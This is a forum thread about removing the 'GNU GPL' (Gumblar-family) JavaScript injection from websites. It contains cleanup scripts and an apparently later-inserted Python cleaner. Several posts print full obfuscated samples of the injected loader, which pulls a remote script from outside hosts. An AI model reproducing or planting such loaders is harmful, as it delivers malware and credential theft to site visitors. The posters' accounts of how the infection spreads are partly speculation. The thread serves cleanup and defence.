/*GNU GPL*/ try{window.onload = function(){var

MOGmartin Registered Users, 500 Post Club
edited April 2010 in On Site Optimization
THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

HERE IS HOW TO FIX IT IN 4 EASY STEPS
(UPDATED AGAIN 12th January - this script has been downloaded over 7,500 times!)



1) Download this file: Cure GNU GPL Virus File (Curevir.php)
2) Extract the file contained in it; it's called curevir.php
3) Upload that file to the ROOT DIRECTORY of your website
4) Go to: http://YOURWEBSITENAME.COM/curevir.php



That's it. It will take a few seconds to a few minutes depending on how large your website is; it scans every file that could be infected, backs it up first, then removes the virus if it finds it.
Once it's done its thing, and you are happy that the virus is gone, you can delete your backups.

IMPORTANT
- you must now change all your FTP passwords; they have been compromised, and your website will be re-infected unless you do this immediately.
If you find this tool useful, PLEASE link to us!



EXAMPLE OF THE FULL CODE:
<script>/*GNU GPL*/ try{window.onload = function(){var X08yhffhg7xkxf = document.createElement('script');X08yhffhg7xkxf.setAttribute('type', 'text/javascript');X08yhffhg7xkxf.setAttribute('id', 
'myscript1');X08yhffhg7xkxf.setAttribute('src',  'h)(@t))!t#)p@:&&#$#/^@!@/!)t($r&a)$)v$i)a)@)n&-
$@@(c##^o$m(&.$u$(&)n(&i(v^@i$s!(@i)@o$&^n)$&$.^(!c@@#&o!$m!$^@.&!r@^$o&!$@b)$(^t!e&&x!-
)$c)#)$o)^$m!!$.@$b^)l&@(u)&(@e#)j)^a!c#&k$!@i$(!n&))^(.!#r^$^u!!)^:(!8&#0$8^!!0#@$/@^#n^$o#&!v@!!
i@#@n)k))y!(#.@$c&#(^#z)@#/###^n^!o!(^(v)))$#i)!&)n@^)k!y^)^.^(c(!@z!!^/#!)c&@#d)i&^s$$(c$^o&(u@!
n$)&t(!.@$!c&$)o$m!&$/$@$w&o)#r)##d(!$!@p)!r@@$e)$s&#s($.@&&c&)))o@&m@(/&#^g^^@(o@o^!g!)l^!e#^
#^.)&!c$!o$#&&&m^$#/^(@&'.replace(/\$|&|\!|\)|@|#|\(|\^/ig, ''));X08yhffhg7xkxf.setAttribute('defer', 
'defer');document.body.appendChild(X08yhffhg7xkxf);}} catch(e) {}</script>


It attacks any webpage that it finds on your server that meets the following criteria:

filename =
index*
default*
*.js

Posts

  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    UPDATE

    Just found a new version; it looks like this. The original script should still solve the problem though....

  • armantine Registered Users
    edited December 2009
    Bonjour,
    Sorry for my English, but I'm French.
    I was infected by this code and I applied your code.
    I think some js files are still infected; I'll resolve that later.
    I have a question: when I refresh a page I see a link in the footer of the browser, but it's too quick and I don't find the link in my apache log.
    Have you got an idea?
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    No problems about your English!! It's better than my French!

    Anyway, I'm not sure what the link is that you mean; do you have a screenshot that I can look at?

    thanks!

    MOGmartin
  • valene Registered Users
    edited December 2009
    MOGmartin wrote: »
    THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!


    INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:

  • scraggz Registered Users
    edited December 2009
    MOGmartin wrote: »
    THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!

    MOGmartin

    Thanks for this. Every one of my domains got hit with it. I had found the ones in the index* and default* files but didn't know about the *.js.

    The tool you recommended fixed them all up in no time. Lifesaver!

    Will link to you for sure!

    Cheers

    Stan
  • charles Registered Users
    edited December 2009
    Thanks for the script; it was a great start. Unfortunately it does not work well on a site that has thousands of files. The script is very memory intensive and slow because it reads the full file into memory and then does a full text search on the file in memory.

    We should avoid this, and leverage shell commands to make things faster and less memory intensive.

    I made the following enhancement to the check_file() function that you might consider including in your script:
    /* START check_file function */

    function check_file($file){

        global $count;

        // only these extensions are scanned
        $ptrn = "/(php|html|shtml|htm|js|tpl|inc)$/";

        // fixed prefix that every copy of the injected script starts with
        $virus_string = '/*GNU GPL*/ try{window.onload = function(){var';

        // never report this script itself: it contains the string above
        if (basename($file) == 'curevir.php') {
            return false;
        }

        if (preg_match($ptrn, $file)) {
            // run a shell command to grep the file instead of loading it into memory;
            // fgrep -l prints the filename only if the fixed string is found
            $execoutput = exec("fgrep -l '{$virus_string}' " . escapeshellarg($file)); // EDIT added escapeshellarg()

            if ($execoutput) {
                // echo a little output so we see progress
                //echo $execoutput . ' ';
                $count++;
                return $file;
            }

            /************************
            // commented out this section, no more full file in memory
            $contents = file_get_contents($file);

            if (strpos($contents, $virus_string) !== false && $file != 'curevir.php') {
                //pa($file.'/'.$file);
                if ($count == 0) {
                    //chmod($file, 0777);
                }

                //pa($file);

                $count++;

                return $file;
            }
            ******************/
        }

        return false;
    }

    /* END check_file function */



    This modification took the script from trying to consume over 1 Gig of RAM and 20+ minutes to a quick response (3-4 mins) and negligible memory / CPU usage.

    charles
    www.forthecode.org
  • charles Registered Users
    edited December 2009
    In my example, you may need to add back the code to prevent the script from detecting itself :)
    Again, thanks for posting your script!
    charles
    www.forthecode.org
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    I've got a fix for these issues; thanks for posting them, by the way. I will upload the new script today,

    cheers!

    MOGmartin
  • mbaum Registered Users
    edited December 2009
    Hi guys,

    the files on my webspace were also affected by this virus.
    Thanks to my webhoster, who had a backup, the damage caused was not that bad.

    But now I have a question for you: how did they get onto my FTP server?
    I have checked all available logfiles for that day; their first login was at 8pm, and the action took about 4.5 hours!

    Is it, as mentioned in the entry post, a problem affecting the Unix servers, or is it possible they found out our FTP access data? Anyway, we changed all the passwords used. How did they get into your files?

    thank you all,
    kind regards from Germany!
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    mbaum wrote: »
    Hi guys,

    the files on my webspace were also affected by this virus.
    Thanks to my webhoster, who had a backup, the damage caused was not that bad.

    But now I have a question for you: how did they get onto my FTP server?
    I have checked all available logfiles for that day; their first login was at 8pm, and the action took about 4.5 hours!

    Is it, as mentioned in the entry post, a problem affecting the Unix servers, or is it possible they found out our FTP access data? Anyway, we changed all the passwords used. How did they get into your files?

    thank you all,
    kind regards from Germany!

    The virus arrives on your machine after visiting an infected webpage; it scans for any common FTP program installed, then harvests any saved passwords and uploads them to their server in China.

    Once they have your passwords they begin infecting your sites as well.

    So, once your sites have been infected, you 100% know that all your saved FTP passwords have also been compromised.

    Scary!
  • Hitbyvirus Registered Users
    edited December 2009
    I was hit hard; it was my computer and my servers. I'm not convinced about the harvesting thing, because all the sites that were hit were on my saved password list for FTP (not a good idea; saving the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

    I'm not discounting the uploading-password theory, but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate login and IP, even on the same site).

    It also did something else. It set up an SMTP engine on my computer and sent so many e-mails that my ISP blocked port 25 on my account.

    It also couldn't be deleted. Not Avast, not Malwarebytes (even after running rkill.bat like for Vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

    I couldn't get the script posted here to work properly as root, as a native user, or with any permissions I tried.

    BTW it also hits files that start with the word "main".
  • SergST Registered Users
    edited December 2009
    MOGmartin wrote: »

    MOGmartin

    Hi.
    I have a problem. This script is started only from a folder with the rights 755. It is necessary to start it, for example, from a folder /forum/remove_virus.php, but so that scanning would begin from ROOT.
    Help.
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    Hitbyvirus wrote: »
    I was hit hard; it was my computer and my servers. I'm not convinced about the harvesting thing, because all the sites that were hit were on my saved password list for FTP (not a good idea; saving the passwords in a text file on the desktop would be safer) AND they were only hit while my computer was on. All times coordinated.

    I'm not discounting the uploading-password theory, but I think it was sending FTP requests via proxy servers (logs show every file hit by a separate login and IP, even on the same site).

    It also did something else. It set up an SMTP engine on my computer and sent so many e-mails that my ISP blocked port 25 on my account.

    It also couldn't be deleted. Not Avast, not Malwarebytes (even after running rkill.bat like for Vundo). Avast finds it but doesn't delete it. You can't delete it in safe mode. Command prompt fails. I had to pull the hard drive and chain it to another system to delete the infected file.

    I couldn't get the script posted here to work properly as root, as a native user, or with any permissions I tried.

    BTW it also hits files that start with the word "main".

    Thanks for the post; it's interesting to see the behaviour that you have encountered. I wonder if it's a slightly different version to the one that I received...

    My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

    I don't have any logs of FTP sessions from my network for that time period though, or at least none that I know of; I will have to check that out.

    Also, I'm behind a serious-strength office firewall, so port 25 is blocked from my machine anyway.

    Finally, thanks for posting, mate; your input is much appreciated!

    MOGmartin
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    SergST wrote: »
    Hi.
    I have a problem. This script is started only from a folder with the rights 755. It is necessary to start it, for example, from a folder /forum/remove_virus.php, but so that scanning would begin from ROOT.
    Help.

    Hi SergST - the script can only recurse subdirectories, I'm afraid, so please place it as far down the directory tree as you possibly can on your site.

    thanks

    MOGmartin
  • Hitbyvirus Registered Users
    edited December 2009
    MOGmartin wrote: »
    Thanks for the post; it's interesting to see the behaviour that you have encountered. I wonder if it's a slightly different version to the one that I received...

    My machine had open connections to a few different ".cn" addresses prior to my account being compromised, and I put two and two together.

    I don't have any logs of FTP sessions from my network for that time period though, or at least none that I know of; I will have to check that out.

    Also, I'm behind a serious-strength office firewall, so port 25 is blocked from my machine anyway.

    Finally, thanks for posting, mate; your input is much appreciated!

    MOGmartin

    Happy to be here :).

    Been reading on Gumblar and every article I read points toward that being the root. Or a variant. I simply went to a site to attempt to book a hotel for a night.

    So far on my servers here is the hit list:

    Any file that starts with index and ends in .php, .htm, .html (index_90210.htm would qualify)
    Any file that starts with default and ends in the extensions above.
    Any file that starts with main and ends with the extensions above.
    Any file ending in .js

    If anyone knows of more please post it here.
  • SergST Registered Users
    edited December 2009
    MOGmartin wrote: »
    Hi SergST - the script can only recurse subdirectories, I'm afraid, so please place it as far down the directory tree as you possibly can on your site.

    thanks

    MOGmartin

    Hello!
    OK, and how do I scan folders having CHMOD 777? I know precisely that this script-virus is in files there. I cannot start a remove_virus.php from such folders.

    Sorry for my English!
    Thanks.


    Site tree:

    |
    public_html (777)
    | -remove_virus.php (does not work)
    index.php
    |
    system (777) -- remove_virus.php (does not work)
    | -application (777) (virus!!!)
    | -cache (755)
    | -database (755) (virus!!!)
    | -libraries (755) (virus!!!)
    | -.....
    forum (755) - remove_virus.php (works, but scans only folder forum and the folders under forum)
    | -...
    |
    ...
  • nevetsnikam Registered Users
    edited December 2009
    MOGmartin wrote: »
    THIS POST CONCERNS THE " <script>/*GNU GPL*/ try{window.onload = function(){var " VIRUS - HOW TO FIX IT!


    INFORMATION: There is a new virus attacking websites hosted on linux servers, when you go to an infected website it just displays a white screen, but if you view the source you see something like this:
  • mbauer Registered Users
    edited December 2009
    I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
    I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

    Thank you!
  • MOGmartin Registered Users, 500 Post Club
    edited December 2009
    mbauer wrote: »
    I have this virus on my sites, too. I understood how I can fix it. But how can I prevent it? Is this virus on my computer? My Anti-Malware program didn't find anything. And my providers said that the virus was uploaded from me.
    I deleted all script rows from my files and changed my passwords. But this can't be all, because if the virus got the passwords once it will get those a second time.

    Thank you!

    You need to firstly change all your FTP passwords.

    Then run a spyware sweep using Avast software; someone sent me a PM this morning to let me know that this antivirus NOW finds the infected files.
  • webster Registered Users
    edited December 2009
    Hello,

    I was also hacked today. But I can't fix the problem, because my code was modified like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var blablabla etc.
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->

    The curevir.php will not work with the additional lines:
    <!--42001c396c3732f4ca699120fdcd6582-->

    curevir finds the infection but it doesn't delete the lines...

    Please help.

    THX
    WEBSTER
  • slavvek Registered Users
    edited December 2009
    webster wrote: »
    Hello,

    I was also hacked today. But I can't fix the problem, because my code was modified like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var blablabla etc.
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->

    The curevir.php will not work with the additional lines:
    <!--42001c396c3732f4ca699120fdcd6582-->

    curevir finds the infection but it doesn't delete the lines...

    Please help.

    THX
    WEBSTER

    I have the same problem and I can't download the file:
    Could not read source file

    Please help

    Best regards
  • AJ~ Registered Users
    edited December 2009
    webster wrote: »
    Hello,

    I was also hacked today. But I can't fix the problem, because my code was modified like this:

    <script>/*GNU GPL*/ try{window.onload = function(){var blablabla etc.
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->
    <!--42001c396c3732f4ca699120fdcd6582-->

    The curevir.php will not work with the additional lines:
    <!--42001c396c3732f4ca699120fdcd6582-->

    curevir finds the infection but it doesn't delete the lines...

    Please help.

    THX
    WEBSTER
    I'm also having this problem. I have similar lines in my infected files after the <script> and it says success when I run curevir.php but sadly nothing is removed.

    Any ideas on how to resolve this?

    Many thanks,

    AJ
  • aingham Registered Users
    edited December 2009
    I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

    I noticed that in a small number of cases it says it has succeeded in curing a file, but if I re-run immediately, they appear again. Not a problem, as I've removed them manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

    Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

    <script>/*GNU GPL*/ try{window.onload = function(){var Osqo3r0s986 = document.createElement('s$(&c&r(@i$)#p&@#t$'.replace(/&|\^|@|\(|\!|\)|\$|#/ig, ''));var Wavk92u2kn = 'Ju8t238iq8';Osqo3r0s986.setAttribute('type', 't(!!&e)$()x!&t$$!/^!@j!&a@@v!a$^)s)c!$r@#i!!)p))#t!!'.replace(/\$|&|@|#|\^|\(|\!|\)/ig, ''));Osqo3r0s986.setAttribute('src', 'h(@)#t!@t!p!:@)@)/!(/)$!a&@@@m!a$@@(&z$&o##@#n(!@-)!c$&(o!(#-)j)p@@)@.)$w@a&^$y&&&2($(s!)#m##)$s!!^$$.$@!#c&$(o&#m#&.)!!u@##s^#(t!^r&!!@e$#@a(m!@(&-$t&v&!.$$t(h)e^)@g(^(^^i(@&(f#@(t(s@&(!a(&)$l(&&^(e(.^^^r!@^^u(:^$!)8#(0@#8@$$0(&&/!&)g##!@o(!)o((g))#l)^@)e#).)$$c(!&o&)$&m^(/#g#))o)@o$$g@!&l@e)#!.#&c^^)o)m$$!#/&s((!k)!y$(#.@!#c)$!o#&m$(!#/^!@e&&$&h!&o&^w&#).@$c!#o(#)&m))/$&^!)c#^!r!&i$#($c)&i(!&n#&^f$&&o&).()!@c@@o@@)m&/$!'.replace(/\(|\^|@|\)|\!|\$|&|#/ig, ''));Osqo3r0s986.setAttribute('defer', 'd#!&&e(((f@@e(!r#'.replace(/@|#|&|\!|\$|\(|\)|\^/ig, ''));Osqo3r0s986.setAttribute('id', 'D!!)i@&a^@#9#@6#$z#!)$f$)t(b&)@6@^@y)$('.replace(/&|\)|\^|\(|#|\$|@|\!/ig, ''));document.body.appendChild(Osqo3r0s986);}} catch(G2lu8zc0m82ax) {}</script>
    <!--4450a0c39e4b85a05898521d2a135e14-->
    <!--4450a0c39e4b85a05898521d2a135e14-->
    <!--4450a0c39e4b85a05898521d2a135e14-->
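The following scanner is an added example written for this thread; it is not curevir.php or any poster's code. It works the way the original post describes the tool (back up, then strip) and takes charles's cheap pre-check idea, but it also removes the <!--hash--> marker lines that webster, aingham and litensweet report curevir leaving behind, limits itself to the index*/default*/main*/*.js names the thread lists, and records the loader host by applying the injection's own replace() regex so the indicator can be blocked and hunted for in logs. The marker string and noise-character set come from the scripts quoted above; the sample file, host and hash are constructed placeholders.

```python
import os
import re
import shutil
import tempfile

# The fixed prefix every variant quoted in the thread starts with.
MARKER = "/*GNU GPL*/ try{window.onload = function(){var"

# One injected block, plus the trailing <!--<32 hex>--> lines that the later
# variant appends and that curevir.php was reported to leave behind.
INJECTION_RE = re.compile(
    r"<script>" + re.escape(MARKER) + r".*?</script>"
    r"(?:\s*<!--[0-9a-f]{32}-->)*[ \t]*\r?\n?",
    re.DOTALL | re.IGNORECASE,
)
WEB_EXT = {".php", ".htm", ".html", ".shtml", ".tpl", ".inc"}


def in_scope(path):
    """Filename criteria reported in the thread (index*, default*, main*, *.js); a priority list, not a guarantee."""
    stem, ext = os.path.splitext(os.path.basename(path).lower())
    if ext == ".js":
        return True
    return ext in WEB_EXT and stem.startswith(("index", "default", "main"))


def decode_src(script_block):
    r"""Recover the loader URL the way the injected code does at runtime: strip the
    eight noise characters of replace(/\$|&|\!|\)|@|#|\(|\^/ig, '') from the padded
    src string. This yields the host to block and hunt for in logs; nothing is fetched."""
    m = re.search(r"setAttribute\('src',\s*'([^']*)'\.replace", script_block)
    return re.sub(r"[$&!)@#(^]", "", m.group(1)) if m else None


def clean_text(text):
    """Return (cleaned text, number of blocks removed, decoded loader URLs)."""
    urls = []

    def strip_block(m):
        url = decode_src(m.group(0))
        if url:
            urls.append(url)
        return ""

    cleaned, count = INJECTION_RE.subn(strip_block, text)
    return cleaned, count, urls


def clean_tree(root, backup_dir):
    """Walk root; back up each infected in-scope file, then rewrite it. Returns {rel path: [URLs]}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not in_scope(path):
                continue
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                original = fh.read()
            if MARKER not in original:  # cheap pre-check, like fgrep -l
                continue
            cleaned, count, urls = clean_text(original)
            if count == 0:  # marker present but not in the expected shape: leave for manual review
                continue
            rel = os.path.relpath(path, root)
            backup = os.path.join(backup_dir, rel)
            os.makedirs(os.path.dirname(backup), exist_ok=True)
            shutil.copy2(path, backup)  # keep the evidence before modifying
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
            report[rel] = urls
    return report


# Constructed sample: the same obfuscation scheme, with a placeholder host and hash.
SAMPLE_SRC = "h@t(t)p:$/&/e#x!a(m)p^l&e$.@i#n!v(a)l^i&d$/l@o#a!d(e)r^.&j$s"
SAMPLE_INFECTED = (
    "<html><body><p>hello</p></body></html>\n"
    "<script>" + MARKER + " X = document.createElement('script');"
    "X.setAttribute('src', '" + SAMPLE_SRC + "'.replace(/\\$|&|\\!|\\)|@|#|\\(|\\^/ig, ''));"
    "document.body.appendChild(X);}} catch(e) {}</script>\n"
    "<!--0123456789abcdef0123456789abcdef-->\n"
    "<!--0123456789abcdef0123456789abcdef-->\n"
)


def run_demo():
    """Infect a throwaway tree with the sample, clean it, return (report, index.php text)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        os.makedirs(os.path.join(root, "blog"))
        for rel in ("index.php", "blog/main_menu.html", "blog/app.js", "blog/about.html"):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(SAMPLE_INFECTED)
        report = clean_tree(root, os.path.join(tmp, "backup"))
        with open(os.path.join(root, "index.php")) as fh:
            return report, fh.read()  # about.html is skipped by in_scope: still grep it by hand
```

The demo deliberately infects blog/about.html too and leaves it untouched, because the name list in the thread is what posters observed, not a guarantee; a full-tree grep for the marker string is still the final check.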
  • litensweet Registered Users
    edited December 2009
    I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:


    <script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then

    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->


    I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded, and while I can see SOME of the site, I can't log in as an admin, and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

    Please help???

    LNS
  • kambodianboi Registered Users
    edited December 2009
    I have made some changes to the script, basically commenting out the backing-up part, so I can cron the script to run 5 times a day, just in case the virus decides to come back. I notified my host and they said it's because of my faulty scripts, lol.

    I suggest everyone cron the script in the main directory, just as a security measure too.
  • aingham Registered Users
    edited December 2009
    I notice that this problem is also mentioned in some Wordpress threads, e.g. http://wordpress.org/support/topic/344181
    Is it possible that this attack is using Wordpress to get in there?
  • kboyko Registered Users
    edited December 2009
    litensweet wrote: »
    I am having this same issue. I've tried reloading my Wordpress files and only portions of the site become available. The script on mine reads as follows:


    <script>/*GNU GPL*/ try{window.onload = function(){var A228lu47ipw = document.createElement('s&(c((^r$##i^^$p&$!#t('.replace(/\)|\(|\!|\^|#|@|&|\$/ig, ''))..... you get the idea... and then

    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->
    <!--455c5ecbefadbebfb9b5ccc6ccdb7b8b-->


    I run curevir.php and it says that it's successful. I even ran it on the newly installed files that I uploaded, and while I can see SOME of the site, I can't log in as an admin, and from what I've read, I understand that the virus will re-infect my site in a matter of moments.

    Please help???

    LNS

    I've posted the update on the script at http://justcoded.com/article/gumblar-family-virus-removal-tool/, you can download new version there.

    Konstantin Boyko,
    http://justcoded.com
  • kboyko Registered Users
    edited December 2009
    I think you still have the virus, you need to make sure that your machine is clean before changing the password. The other measure is to not save your password in FileZilla - it is known as the client where passwords can be stolen. From my experience WinSCP is safe for now.

    Regards,
    Konstantin Boyko
    http://justcoded.com
    aingham wrote: »
    I've experienced this problem on my hosting. Many thanks for the script, which has really helped.

    I noticed that in a small number of cases it says it has succeeded in curing a file, but if I re-run immediately, they appear again. Not a problem, as I've removed them manually, but I've given an example below (from an INDEX.PHP file) which wasn't removed.

    Any ideas yet what the underlying problem might be? I am using FileZilla and I do have Adobe Acrobat installed. I changed my FTP passwords but I was still re-infected and I'm the only person with FTP access to my shared hosting (Go Daddy).

  • slavvek Registered Users
    edited December 2009
    Thanks for the script,
    but I still have a problem.
    My index.php and other files are clean, but still when I go to my web I see only a white site.

    Sorry for my English

    Please help
    Best regards
  • kma9000 Registered Users
    edited December 2009
    I just wanted to register and say thank you for this great script. I was infected by this virus on several domains, but after uploading the curevir.php script and running it in each directory it would appear to have cleared it completely.

    For future reference, the virus attempts to load things onto the hosts computer, I noticed this message:
    This web site wants to run the following add-on: 'Microsoft Data
    Access - Remote Data Services Dat...' from 'Microsoft Corporation'. If
    you trust the web site and the add-on and want to allow it to run,
    click here...

    I was also receiving a warning message similar to this:
    http://img199.imageshack.us/img199/4237/warninga.jpg